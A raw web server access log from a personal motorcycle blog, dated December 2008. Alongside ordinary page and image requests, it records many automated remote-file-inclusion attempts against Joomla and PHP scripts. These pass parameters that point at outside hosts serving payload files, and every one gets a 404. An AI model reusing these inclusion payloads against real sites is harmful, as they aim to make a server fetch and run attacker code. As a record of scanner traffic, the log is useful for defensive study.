58.217.129.52 - - [08/Dec/2008:08:14:59 -0800] "GET /blog/index.php/2008/09/13/occ-american-hondas-part-2/ HTTP/1.1" 200 8465 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:59 -0800] "GET /?show=gallery&pageid=172 HTTP/1.1" 200 166028 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:59 -0800] "GET /blog/index.php/2008/08/28/occ-american-hondas-part-1/ HTTP/1.1" 200 9741 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:59 -0800] "GET /?show=gallery&pageid=169 HTTP/1.1" 200 166028 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:59 -0800] "GET /blog/index.php/category/motorcycles/ HTTP/1.1" 200 97076 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:59 -0800] "GET /blog/index.php/2008/10/09/so-this-guy-walks-into-a-bank-10908/ HTTP/1.1" 200 9625 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:59 -0800] "GET /?show=gallery&pageid=163 HTTP/1.1" 200 166028 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:00 -0800] "GET /?show=gallery&pageid=159 HTTP/1.1" 200 166028 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:00 -0800] "GET /funny/?S=D HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:01 -0800] "GET /blog/index.php/2008/09/21/a-little-game-of-moto-tag-92108/ HTTP/1.1" 200 8833 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:01 -0800] "GET /blog/index.php/2008/08/18/dan-mulkiewicz-for-president/ HTTP/1.1" 200 7120 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:01 -0800] "GET /blog/index.php/2008/09/21/a-little-game-of-moto-tag-92108/ HTTP/1.1" 200 8833 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:15:01 -0800] "GET /logs/access_080404.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:02 -0800] "GET /blog/index.php/2008/08/18/dan-mulkiewicz-for-president/ HTTP/1.1" 200 7120 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:02 -0800] "GET /blog/index.php/category/uncategorized/ HTTP/1.1" 200 9884 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:02 -0800] "GET /blog/index.php/2008/08/16/techstoc-2008-71208/ HTTP/1.1" 200 8263 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:02 -0800] "GET /?show=gallery&pageid=17 HTTP/1.1" 200 166027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:04 -0800] "GET /blog/index.php/2008/08/16/techstoc-2008-71208/ HTTP/1.1" 200 8263 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:04 -0800] "GET /blog/wp-content/uploads/dmulk_westoc08_actual.gdb HTTP/1.1" 200 714378 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:04 -0800] "GET /blog/index.php/2008/08/12/westoc-2008-trip-61208-62708/ HTTP/1.1" 200 66112 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:05 -0800] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie/ HTTP/1.1" 200 7196 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:05 -0800] "GET /blog/index.php/2008/08/12/westoc-2008-trip-61208-62708/ HTTP/1.1" 200 66112 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:05 -0800] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie/ HTTP/1.1" 200 7196 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:06 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.1" 200 9451 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:07 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.1" 200 9451 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:07 -0800] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/ HTTP/1.1" 200 7923 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:08 -0800] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/ HTTP/1.1" 200 7923 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:09 -0800] "GET /blog/index.php/2008/10/ HTTP/1.1" 200 12585 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:11 -0800] "GET /blog/index.php/2008/09/ HTTP/1.1" 200 14746 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:11 -0800] "GET /blog/index.php/2008/08/ HTTP/1.1" 200 77121 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:12 -0800] "GET /blog/index.php/page/2/ HTTP/1.1" 200 13384 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:12 -0800] "GET /blog/wp-login.php HTTP/1.1" 200 1860 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:12 -0800] "GET /blog/index.php/2008/06/ HTTP/1.1" 200 15748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:12 -0800] "GET /blog/index.php/2008/04/ HTTP/1.1" 200 13666 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:13 -0800] "GET /blog/index.php/feed/ HTTP/1.1" 200 9678 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:15:14 -0800] "GET /blog/index.php/comments/feed/ HTTP/1.1" 200 5051 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:15:22 -0800] "GET /logs/access_080904.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:08:15:28 -0800] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:08:15:28 -0800] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.53.3 - - [08/Dec/2008:08:15:40 -0800] "GET /logs/access_071103.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.146.53.3 - - [08/Dec/2008:08:15:40 -0800] "GET /logs/access_071125.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://genomelife.com/ecology/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.11 - - [08/Dec/2008:08:15:41 -0800] "GET /logs/access_080703.log%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photo.jcc.idv.tw/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:15:46 -0800] "GET /logs/access_080816.log///vwar/backup/errors.php?error=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:16:03 -0800] "GET /blog/index.php/2008/10/09/so-this-guy-walks-into-a-bank-10908/feed/ HTTP/1.1" 200 737 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:16:03 -0800] "GET /blog/index.php/2008/10/09/so-this-guy-walks-into-a-bank-10908/?show=gallery HTTP/1.1" 200 11489 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:16:04 -0800] "GET /blog/index.php/2008/10/09/so-this-guy-walks-into-a-bank-10908/ HTTP/1.1" 200 9609 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:16:04 -0800] "GET /blog/index.php/2008/10/09/so-this-guy-walks-into-a-bank-10908/trackback/ HTTP/1.1" 200 9635 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:16:08 -0800] "GET /logs/access_080925.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:16:25 -0800] "GET /logs/access_081022.log//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.186.161.236 - - [08/Dec/2008:08:16:25 -0800] "GET /logs//adminhead.php?path%5Bdocroot%5D=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:16:26 -0800] "GET /adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.186.161.236 - - [08/Dec/2008:08:16:26 -0800] "GET /adminhead.php?path%5Bdocroot%5D=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:16:26 -0800] "GET /logs//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:16:27 -0800] "GET /logs/access_081109.log//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.26 - - [08/Dec/2008:08:17:01 -0800] "GET /logs/access_080402.log HTTP/1.1" 200 1900544 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:03 -0800] "GET /blog/index.php/page/2/ HTTP/1.1" 200 13384 "http://images.google.com/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1124.JPG&imgrefurl=http://dmulk.com/blog/page/2/&usg=__ZYwVKOThL-9DdJgnTgtuPGzUl00=&h=2592&w=3888&sz=3732&hl=en&start=8&tbnid=2BO_RyJdgi3GJM:&tbnh=100&tbnw=150&prev=/images%3Fq%3Dnice%2Bmotorcycles%26imgsz%3Dhuge%26gbv%3D2%26hl%3Den%26rlz%3D1T4GFRD_enUS270US276" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:03 -0800] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:04 -0800] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:04 -0800] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:04 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:05 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:05 -0800] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
218.239.45.184 - - [08/Dec/2008:08:17:11 -0800] "GET /logs/access_080425.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [08/Dec/2008:08:17:11 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [08/Dec/2008:08:17:12 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:14 -0800] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:18 -0800] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:19 -0800] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
77.232.91.201 - - [08/Dec/2008:08:17:21 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.91.201 - - [08/Dec/2008:08:17:21 -0800] "GET /errors.php?error=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:24 -0800] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&50 HTTP/1.1" 200 211614 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:25 -0800] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 0 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:25 -0800] "GET /blog/wp-content/gallery/2008-mountain-calstoc/028-2.jpg HTTP/1.1" 200 497380 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
216.104.34.142 - - [08/Dec/2008:08:17:26 -0800] "GET /parse/parser.php?WN_BASEDIR=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
216.104.34.142 - - [08/Dec/2008:08:17:35 -0800] "GET /logs//parse/parser.php?WN_BASEDIR=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
216.104.34.142 - - [08/Dec/2008:08:17:35 -0800] "GET /logs/access_081018.log//parse/parser.php?WN_BASEDIR=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
216.104.34.142 - - [08/Dec/2008:08:17:35 -0800] "GET /logs/access_080829.log//parse/parser.php?WN_BASEDIR=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:35 -0800] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
61.19.42.210 - - [08/Dec/2008:08:17:38 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:40 -0800] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 3839261 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
61.19.42.210 - - [08/Dec/2008:08:17:40 -0800] "GET /modifyform.html?code=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.42.210 - - [08/Dec/2008:08:17:42 -0800] "GET /logs/modifyform.html?code=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:44 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-160.jpg HTTP/1.1" 200 607227 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:48 -0800] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.1" 200 3726 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:17:49 -0800] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 3013085 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
218.239.45.184 - - [08/Dec/2008:08:17:59 -0800] "GET /logs/access_080605.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.42.210 - - [08/Dec/2008:08:18:02 -0800] "GET /logs/access_080102.log/modifyform.html?code=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [08/Dec/2008:08:18:04 -0800] "GET /logs/access_080228.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photo.jcc.idv.tw/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:18:10 -0800] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 3221099 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:18:15 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-050_3.jpg HTTP/1.1" 200 448201 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
124.0.71.7 - - [08/Dec/2008:08:18:16 -0800] "GET /logs/access_081018.log//parse/parser.php?WN_BASEDIR=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:08:18:16 -0800] "GET /parse/parser.php?WN_BASEDIR=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:08:18:16 -0800] "GET /logs//parse/parser.php?WN_BASEDIR=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:08:18:17 -0800] "GET /logs/access_080829.log//parse/parser.php?WN_BASEDIR=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:18:21 -0800] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.1" 200 4254533 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:18:25 -0800] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:18:26 -0800] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
